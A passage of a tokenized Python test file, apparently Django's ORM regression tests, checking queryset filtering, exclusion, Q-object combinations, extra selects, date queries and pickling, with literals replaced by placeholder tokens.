'<STR_LIT>' , created = self . time1 , modified = self . time1 , creator = self . a1 , note = self . n3 ) <EOL> self . i1 . tags = [ self . t1 , self . t2 ] <EOL> self . i2 = Item . objects . create ( name = '<STR_LIT>' , created = self . time2 , creator = self . a2 , note = n2 ) <EOL> self . i2 . tags = [ self . t1 , self . t3 ] <EOL> self . i3 = Item . objects . create ( name = '<STR_LIT>' , created = time3 , creator = self . a2 , note = self . n3 ) <EOL> i4 = Item . objects . create ( name = '<STR_LIT>' , created = time4 , creator = self . a4 , note = self . n3 ) <EOL> i4 . tags = [ t4 ] <EOL> self . r1 = Report . objects . create ( name = '<STR_LIT>' , creator = self . a1 ) <EOL> Report . objects . create ( name = '<STR_LIT>' , creator = a3 ) <EOL> Report . objects . create ( name = '<STR_LIT>' ) <EOL> self . rank1 = Ranking . objects . create ( rank = <NUM_LIT:2> , author = self . a2 ) <EOL> Cover . objects . create ( title = "<STR_LIT>" , item = i4 ) <EOL> Cover . objects . create ( title = "<STR_LIT>" , item = self . i2 ) <EOL> def test_ticket1050 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__id__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket1801 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item = self . i2 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item = self . i3 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item = self . i2 ) & Author . objects . filter ( item = self . i3 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket2306 ( self ) : <EOL> query = Item . objects . filter ( tags = self . t2 ) . query <EOL> self . assertTrue ( query . LOUTER not in [ x [ <NUM_LIT:2> ] for x in query . alias_map . values ( ) ] ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) ) . filter ( Q ( tags = self . t2 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) ) . filter ( Q ( creator__name = '<STR_LIT>' ) | Q ( tags = self . t2 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) & Q ( tags = self . t2 ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( tags = self . t1 ) , Q ( creator__name = '<STR_LIT>' ) | Q ( tags = self . t2 ) ) , <EOL> [ ] <EOL> ) <EOL> qs = Author . objects . filter ( ranking__rank = <NUM_LIT:2> , ranking__id = self . rank1 . id ) <EOL> self . assertQuerysetEqual ( list ( qs ) , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , qs . query . count_active_tables ( ) , <NUM_LIT:2> ) <EOL> qs = Author . objects . filter ( ranking__rank = <NUM_LIT:2> ) . filter ( ranking__id = self . rank1 . id ) <EOL> self . assertEqual ( qs . query . count_active_tables ( ) , <NUM_LIT:3> ) <EOL> def test_ticket4464 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags = self . t1 ) . filter ( tags = self . t2 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . distinct ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . filter ( tags = self . t3 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . order_by ( '<STR_LIT:name>' ) [ : <NUM_LIT:3> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ self . t1 , self . t2 ] ) . distinct ( ) . order_by ( '<STR_LIT:name>' ) [ : <NUM_LIT:3> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_2080_3592 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item__name = '<STR_LIT>' ) | Author . objects . filter ( name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( item__name = '<STR_LIT>' ) | Q ( name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( name = '<STR_LIT>' ) | Q ( item__name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( item__name = '<STR_LIT>' ) | Q ( report__name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket6074 ( self ) : <EOL> self . assertQuerysetEqual ( Author . objects . filter ( Q ( id__in = [ ] ) ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( id__in = [ ] ) | Q ( id__in = [ ] ) ) , <EOL> [ ] <EOL> ) <EOL> def test_tickets_1878_2939 ( self ) : <EOL> self . assertEqual ( Item . objects . values ( '<STR_LIT>' ) . distinct ( ) . count ( ) , <NUM_LIT:3> ) <EOL> xx = Item ( name = '<STR_LIT>' , created = self . time1 , creator = self . a2 , note = self . n1 ) <EOL> xx . save ( ) <EOL> self . assertEqual ( <EOL> Item . objects . exclude ( name = '<STR_LIT>' ) . values ( '<STR_LIT>' , '<STR_LIT:name>' ) . distinct ( ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> self . assertEqual ( <EOL> Item . objects . exclude ( name = '<STR_LIT>' ) . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:%s>' } , select_params = ( <NUM_LIT:1> , ) ) . values ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:foo>' ) . distinct ( ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> self . assertEqual ( <EOL> Item . objects . exclude ( name = '<STR_LIT>' ) . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:%s>' } , select_params = ( <NUM_LIT:1> , ) ) . values ( '<STR_LIT>' , '<STR_LIT:name>' ) . distinct ( ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> xx . delete ( ) <EOL> def test_ticket7323 ( self ) : <EOL> self . assertEqual ( Item . objects . values ( '<STR_LIT>' , '<STR_LIT:name>' ) . count ( ) , <NUM_LIT:4> ) <EOL> def test_ticket2253 ( self ) : <EOL> q1 = Item . objects . order_by ( '<STR_LIT:name>' ) <EOL> q2 = Item . objects . filter ( id = self . i1 . id ) <EOL> self . assertQuerysetEqual ( <EOL> q1 , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( q2 , [ '<STR_LIT>' ] ) <EOL> self . assertQuerysetEqual ( <EOL> ( q1 | q2 ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( ( q1 & q2 ) . order_by ( '<STR_LIT:name>' ) , [ '<STR_LIT>' ] ) <EOL> q1 = Item . objects . filter ( tags = self . t1 ) <EOL> q2 = Item . objects . filter ( note = self . n3 , tags = self . t2 ) <EOL> q3 = Item . objects . filter ( creator = self . a4 ) <EOL> self . assertQuerysetEqual ( <EOL> ( ( q1 & q2 ) | q3 ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_4088_4306 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator__num = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Report . objects . filter ( creator__id = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator__id = self . a1 . id ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . filter ( creator__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket4510 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( report__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7378 ( self ) : <EOL> self . assertQuerysetEqual ( self . a1 . report_set . all ( ) , [ '<STR_LIT>' ] ) <EOL> def test_tickets_5324_6704 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) . distinct ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) . distinct ( ) . reverse ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . exclude ( item__name = '<STR_LIT>' ) . distinct ( ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' ) . exclude ( tags__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> query = Item . objects . exclude ( creator__in = [ self . a1 , self . a2 ] ) . query <EOL> self . assertTrue ( query . LOUTER not in [ x [ <NUM_LIT:2> ] for x in query . alias_map . values ( ) ] ) <EOL> qs = Author . objects . filter ( id = self . a1 . id ) . filter ( Q ( extra__note = self . n1 ) | Q ( item__note = self . n3 ) ) <EOL> self . assertEqual ( <EOL> len ( [ x [ <NUM_LIT:2> ] for x in qs . query . alias_map . values ( ) if x [ <NUM_LIT:2> ] == query . LOUTER and qs . query . alias_refcount [ x [ <NUM_LIT:1> ] ] ] ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( parent__isnull = True ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent__isnull = True ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( Q ( parent__name = '<STR_LIT>' ) | Q ( parent__isnull = True ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( Q ( parent__isnull = True ) | Q ( parent__name = '<STR_LIT>' ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( Q ( parent__parent__isnull = True ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( ~ Q ( parent__parent__isnull = True ) ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket2091 ( self ) : <EOL> t = Tag . objects . get ( name = '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__in = [ t ] ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_heterogeneous_qs_combination ( self ) : <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> lambda : Author . objects . all ( ) & Tag . objects . all ( ) <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> lambda : Author . objects . all ( ) | Tag . objects . all ( ) <EOL> ) <EOL> def test_ticket3141 ( self ) : <EOL> self . assertEqual ( Author . objects . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:1>' } ) . count ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( <EOL> Author . objects . extra ( select = { '<STR_LIT:foo>' : '<STR_LIT:%s>' } , select_params = ( <NUM_LIT:1> , ) ) . count ( ) , <EOL> <NUM_LIT:4> <EOL> ) <EOL> def test_ticket2400 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( item__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( item__isnull = True ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket2496 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . extra ( tables = [ '<STR_LIT>' ] ) . select_related ( ) . order_by ( '<STR_LIT:name>' ) [ : <NUM_LIT:1> ] , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_2076_7256 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Cover . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( tags__isnull = False ) . order_by ( '<STR_LIT>' , '<STR_LIT:id>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> qs = Item . objects . order_by ( '<STR_LIT:name>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertEqual ( len ( qs . query . tables ) , <NUM_LIT:1> ) <EOL> def test_tickets_2874_3002 ( self ) : <EOL> qs = Item . objects . select_related ( ) . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . assertQuerysetEqual ( <EOL> qs , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertTrue ( repr ( qs [ <NUM_LIT:0> ] . note ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( qs [ <NUM_LIT:0> ] . creator . extra . note ) , '<STR_LIT>' ) <EOL> def test_ticket3037 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( creator__name = '<STR_LIT>' , name = '<STR_LIT>' ) | Q ( creator__name = '<STR_LIT>' , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_5321_7070 ( self ) : <EOL> self . assertValueQuerysetEqual ( <EOL> Note . objects . values ( '<STR_LIT>' ) . distinct ( ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ { '<STR_LIT>' : u'<STR_LIT:foo>' } , { '<STR_LIT>' : u'<STR_LIT:bar>' } , { '<STR_LIT>' : u'<STR_LIT:foo>' } ] <EOL> ) <EOL> def test_ticket4358 ( self ) : <EOL> self . assertTrue ( '<STR_LIT>' in ExtraInfo . objects . values ( ) [ <NUM_LIT:0> ] ) <EOL> self . assertValueQuerysetEqual ( <EOL> ExtraInfo . objects . values ( '<STR_LIT>' ) , <EOL> [ { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:2> } ] <EOL> ) <EOL> self . assertValueQuerysetEqual ( <EOL> ExtraInfo . objects . values ( '<STR_LIT>' ) , <EOL> [ { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:2> } ] <EOL> ) <EOL> def test_ticket2902 ( self ) : <EOL> s = [ ( '<STR_LIT:a>' , '<STR_LIT:%s>' ) , ( '<STR_LIT:b>' , '<STR_LIT:%s>' ) ] <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } . keys ( ) == [ '<STR_LIT:a>' , '<STR_LIT:b>' ] : <EOL> s . reverse ( ) <EOL> params . reverse ( ) <EOL> d = Item . objects . extra ( select = SortedDict ( s ) , select_params = params ) . values ( '<STR_LIT:a>' , '<STR_LIT:b>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( d , { '<STR_LIT:a>' : u'<STR_LIT>' , '<STR_LIT:b>' : u'<STR_LIT>' } ) <EOL> l = Item . objects . extra ( select = { '<STR_LIT:count>' : '<STR_LIT>' } ) . order_by ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ o . count for o in l ] , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> def test_ticket6154 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( id = self . a1 . id ) . filter ( Q ( extra__note = self . n1 ) | Q ( item__note = self . n3 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( extra__note = self . n1 ) | Q ( item__note = self . n3 ) ) . filter ( id = self . a1 . id ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket6981 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket9926 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . select_related ( '<STR_LIT>' , "<STR_LIT>" ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_6180_6203 ( self ) : <EOL> self . assertEqual ( Item . objects . count ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . count ( ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] , datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> def test_tickets_7087_12242 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . extra ( select = { '<STR_LIT:a>' : <NUM_LIT:1> } ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . extra ( select = { '<STR_LIT:a>' : <NUM_LIT:1> } ) . dates ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> name = "<STR_LIT>" <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . extra ( where = [ '<STR_LIT>' ] , params = [ name ] ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . extra ( where = [ '<STR_LIT>' ] , params = [ name ] ) . dates ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7155 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7098 ( self ) : <EOL> self . assertValueQuerysetEqual ( <EOL> Item . objects . values ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' , '<STR_LIT:id>' ) , <EOL> [ { '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : u'<STR_LIT>' } ] <EOL> ) <EOL> def test_ticket7096 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( parent = self . t1 , name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent = self . t1 , name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) . distinct ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__in = [ '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( tags__name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( ~ Q ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( ~ Q ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) , name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( ~ Q ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) , name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_7204_7506 ( self ) : <EOL> pickle . dumps ( Item . objects . all ( ) ) <EOL> def test_ticket7813 ( self ) : <EOL> qs = Item . objects . select_related ( ) <EOL> query = qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] <EOL> query2 = pickle . loads ( pickle . dumps ( qs . query ) ) <EOL> self . assertEqual ( <EOL> query2 . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] , <EOL> query <EOL> ) <EOL> def test_deferred_load_qs_pickling ( self ) : <EOL> qs = Item . objects . defer ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> q2 = pickle . loads ( pickle . dumps ( qs ) ) <EOL> self . assertEqual ( list ( qs ) , list ( q2 ) ) <EOL> q3 = pickle . loads ( pickle . dumps ( qs , pickle . HIGHEST_PROTOCOL ) ) <EOL> self . assertEqual ( list ( qs ) , list ( q3 ) ) <EOL> def test_ticket7277 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> self . n1 . annotation_set . filter ( Q ( tag = self . t5 ) | Q ( tag__children = self . t5 ) | Q ( tag__children__children = self . t5 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_7448_7707 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( created__in = [ self . time1 , self . time2 ] ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7235 ( self ) : <EOL> q = EmptyQuerySet ( ) <EOL> self . assertQuerysetEqual ( q . all ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . filter ( x = <NUM_LIT:10> ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . exclude ( y = <NUM_LIT:3> ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . complex_filter ( { '<STR_LIT>' : <NUM_LIT:1> } ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . select_related ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . annotate ( Count ( '<STR_LIT>' ) ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . distinct ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> q . extra ( select = { '<STR_LIT>' : "<STR_LIT>" } ) , <EOL> [ ] <EOL> ) <EOL> q . query . low_mark = <NUM_LIT:1> <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> q . extra , select = { '<STR_LIT>' : "<STR_LIT>" } <EOL> ) <EOL> self . assertQuerysetEqual ( q . reverse ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . defer ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . only ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> def test_ticket7791 ( self ) : <EOL> self . assertEqual ( <EOL> len ( Note . objects . order_by ( '<STR_LIT>' ) . distinct ( ) ) , <EOL> <NUM_LIT:3> <EOL> ) <EOL> qs = Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _ = pickle . loads ( pickle . dumps ( qs ) ) <EOL> def test_ticket9997 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( name__in = Tag . objects . filter ( parent = self . t1 ) . values ( '<STR_LIT:name>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> TypeError , <EOL> '<STR_LIT>' , <EOL> lambda : Tag . objects . filter ( name__in = Tag . objects . filter ( parent = self . t1 ) . values ( '<STR_LIT:name>' , '<STR_LIT:id>' ) ) <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> TypeError , <EOL> '<STR_LIT>' , <EOL> lambda : Tag . objects . filter ( name__in = Tag . objects . filter ( parent = self . t1 ) . values_list ( '<STR_LIT:name>' , '<STR_LIT:id>' ) ) <EOL> ) <EOL> def test_ticket9985 ( self ) : <EOL> self . assertValueQuerysetEqual ( <EOL> Note . objects . values_list ( "<STR_LIT>" , flat = True ) . values ( "<STR_LIT:id>" ) . order_by ( "<STR_LIT:id>" ) , <EOL> [ { '<STR_LIT:id>' : <NUM_LIT:1> } , { '<STR_LIT:id>' : <NUM_LIT:2> } , { '<STR_LIT:id>' : <NUM_LIT:3> } ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . filter ( notes__in = Note . objects . filter ( note = "<STR_LIT>" ) . values_list ( '<STR_LIT>' ) . values ( '<STR_LIT:id>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket10205 ( self ) : <EOL> self . assertEqual ( Tag . objects . filter ( 